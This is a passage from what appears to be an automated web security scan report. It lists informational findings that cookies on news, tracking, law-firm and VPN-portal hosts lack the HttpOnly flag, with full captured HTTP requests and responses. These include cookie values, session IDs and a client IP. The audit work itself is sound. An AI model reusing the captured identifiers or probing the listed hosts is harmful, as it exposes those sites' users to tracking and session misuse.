P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Fri, 13 May 2011 11:37:58 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=JzUPJLV5c/sVIHOf; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; expires=Tue, 08-Nov-2011 11:37:58 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 11:37:58 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

14.133. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1; nyt-m=D5A6A596AEC66C101E6FF77DE512588B&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.11.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:15:57 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...

14.134. http://track.ft.com/track/track.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.ft.com
Path:   /track/track.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track/track.js HTTP/1.1
Host: track.ft.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Set-Cookie: FTUserTrack=173.193.214.243.1305198170970491; path=/; expires=Sun, 09-May-21 11:02:50 GMT; domain=.ft.com
Set-Cookie: AYSC=_04dc_13USA_14USA_15us_17mid%2Batlantic_18washington_24north%2Bamerica_25high_26202_27PVT_99S_; Domain=.ft.com; Path=/
Cache-Control: no-cache
Content-Length: 0
Date: Thu, 12 May 2011 11:02:50 GMT
Connection: Keep-Alive
Location: http://media.ft.com/null.js
Server: Apache/2.2.17 (Unix) mod_jk/1.2.30 mod_ssl/2.2.17 OpenSSL/0.9.7d
Content-Type: application/x-javascript
Pragma: no-cache


14.135. http://translate.googleapis.com/translate_a/t

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://securelab.digiware.net/?cat=8
Origin: http://securelab.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1118

q=Rss%20Feed&q=Tweeter%20button&q=Acerca%20de&q=search&q=skip%20to%20content%20%E2%86%93&q=Home&q=Casos%20de%20uso&q=Uncategorized&q=Casos%20de%20uso&q=Fuga%20de%20informaci%C3%B3n%20por%20email%20%C2
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:06 GMT
Expires: Thu, 12 May 2011 13:07:06 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=2acf7ee0ad804026:TM=1305205626:LM=1305205626:S=ipDBSJmxfVDAaQKy; expires=Sat, 11-May-2013 13:07:06 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1311

["Rss Feed","Tweeter button","About","search","skip to content ...","Home","Use Cases","Uncategorized","Use Cases","Email information leak \x26quot;intentional?","\x3ca i=0\x3eby\x3c/a\x3e \x3ca i=1\x
...[SNIP]...

14.136. http://va.px.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwL/N596xAAAtYAZp"; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI2N119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF49ZlFgEli742V71gUmDT2PwHSBkwW268BaQCvyAyE; io_freq_p1="eJzjkuY4HijAJLH3xsp3LAqMGj9BtAGTxfZrQBoAnC8L5w=="

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcWxZx+zwKX2K+9YACvmBhc=";Version=1;Path=/;Domain=invitemedia.com;Expires=Fri, 11-May-2012 11:49:38 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


14.137. https://virtualoffice.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://virtualoffice.tuckerellis.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: virtualoffice.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:53 GMT
Server: SonicWALL SSL-VPN Web Server
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;
Keep-Alive: timeout=20, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 173

<HTML>
<HEAD><meta http-equiv="refresh" content="0; URL=/cgi-bin/welcome">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</HEAD>
<BODY> </BODY>
</HTML>

14.138. http://wt.o.nytimes.com/dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt.o.nytimes.com
Path:   /dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif?&dcsdat=1305198972966&dcssip=topics.nytimes.com&dcsuri=/topics/reference/timestopics/subjects/p/private_equity/index.html&dcsqry=?inline=nyt-classifier&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20News%20-%20The%20New%20York%20Times&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1046x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html&WT.cg_n=Times%20Topics&WT.z_gpt=Topic&WT.z_gpst=Subject&WT.z_gtn=Private%20Equity&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.rv=0&WT.mc_ev=&WT.vt_f_tlv=&WT.vt_f_tlh=1305198956&WT.vt_f_d=&WT.vt_f_s=&WT.vt_f_a=&WT.vt_f= HTTP/1.1
Host: wt.o.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAGzBy018vstNCr4AANZwyk2Hb8pNAQAAAHhHAABswctNfL7LTQAAAAA-; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198972967:ss=1305198204263

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Thu, 12 May 2011 11:16:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs3baftr1000008q5oxvjceo_4r9g/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1305198972966&dcssip=topics.nytimes.com&dcsuri=/topics/reference/timestopics/subjects/p/private_equity/index.html&dcsqry=?inline=nyt-classifier&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20News%20-%20The%20New%20York%20Times&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1046x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html&WT.cg_n=Times%20Topics&WT.z_gpt=Topic&WT.z_gpst=Subject&WT.z_gtn=Private%20Equity&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.rv=0&WT.mc_ev=&WT.vt_f_tlv=&WT.vt_f_tlh=1305198956&WT.vt_f_d=&WT.vt_f_s=&WT.vt_f_a=&WT.vt_f=
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAHAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAGzBy018vstNCr4AANZwyk2Hb8pND74AAHzBy018wctNAQAAAHhHAAB8wctNfL7LTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.139. http://wt.o.nytimes.com/dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wt.o.nytimes.com
Path:   /dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsc32upj10000c58n7kgpaeo_8i3g/dcs.gif?&dcsdat=1305198204254&dcssip=dealbook.nytimes.com&dcsuri=/2011/05/09/private-equity-has-a-horse-in-this-race/&WT.co_f=173.193.214.243-4039295808.30148852&WT.vt_sid=173.193.214.243-4039295808.30148852.1305198204263&WT.vt_f_tlv=1305112015&WT.tz=-5&WT.bh=6&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Private%20Equity%20Has%20a%20Horse%20in%20the%20Race%20-%20NYTimes.com&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=925x964&WT.fi=Yes&WT.fv=10.2&WT.tv=1.0.7&WT.dl=0&WT.es=dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/&WT.z_fbc=&WT.cg_n=Business&WT.cg_s=Dealbook&WT.z_gpt=Blogs&WT.z_gpst=Blog%20Post&WT.z_puv=normal&WT.z_clmst=By%20PETER%20LATTMAN&WT.z_bn=dealbook&WT.z_pud=20110509&WT.z_nyts=&WT.z_nytd=&WT.z_rmid=27fdc70e4ff84dbef4b4b43a&WT.z_gblc=Private%20Equity;Retail/Leisure&WT.rv=0&WT.z_pudr=3%20Day&WT.z_pyr=2011&WT.mc_ev=&WT.vt_f_tlh=1305112816&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=&WT.vt_f= HTTP/1.1
Host: wt.o.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAAVuyk0EbspNCr4AANZwyk2Hb8pNAQAAAHhHAADxcMpN5W3KTQAAAAA-; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:04:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My00MDM5Mjk1ODA4LjMwMTQ4ODUyAAAAAAAGAAAAmLwAANj0vk3W9L5NF74AAOdtyk3lbcpNNMEAAPFwyk3obcpNDb4AALxuyk3qbcpN+L0AAMa+y03GvstNCr4AANZwyk2Hb8pNAQAAAHhHAADGvstNxr7LTQAAAAA-; path=/; expires=Sun, 09-May-2021 11:04:38 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

14.140. https://ww3.janus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vj-ww3-advisor=3540783276.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:23:51 GMT
Content-length: 1078
Content-type: image/x-icon
Etag: "49d1b3b5-1-436-0"
Last-modified: Thu, 05 May 2011 10:16:06 GMT
Accept-ranges: bytes
Set-Cookie: vj-ww3=3758887084.20480.0000; path=/

..............(...&... ..........N...(....... ...........................................]]`.333.........rsu.........DFI.............||~...........[......K...\LK..:.f........++...
..Gn...
+.7....C{..
...[SNIP]...

14.141. http://www.apolloglobal.us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apolloglobal.us
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:33:08 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
X-Powered-By: PHP/5.2.3-1ubuntu6.4
Set-Cookie: b01a8bbc2b6e57a153d5c05069526f2b=90998af0e63385948cbcf9309ad4789f; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 09:33:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...

14.142. http://www.apolloglobal.us/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apolloglobal.us
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?option=com_content&view=article&id=20&Itemid=34 HTTP/1.1
Host: www.apolloglobal.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:33:10 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
X-Powered-By: PHP/5.2.3-1ubuntu6.4
Set-Cookie: b01a8bbc2b6e57a153d5c05069526f2b=a3b2a52a7ef8a8f9e10abb2501b30b93; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 09:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...

14.143. http://www.beneschlaw.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beneschlaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.beneschlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Benesch+Friedlander+Coplan+%26+Aronoff&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 58767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000183
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A73
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1115; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1086; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=oubtev45t21ysketzbkids23; path=/; HttpOnly
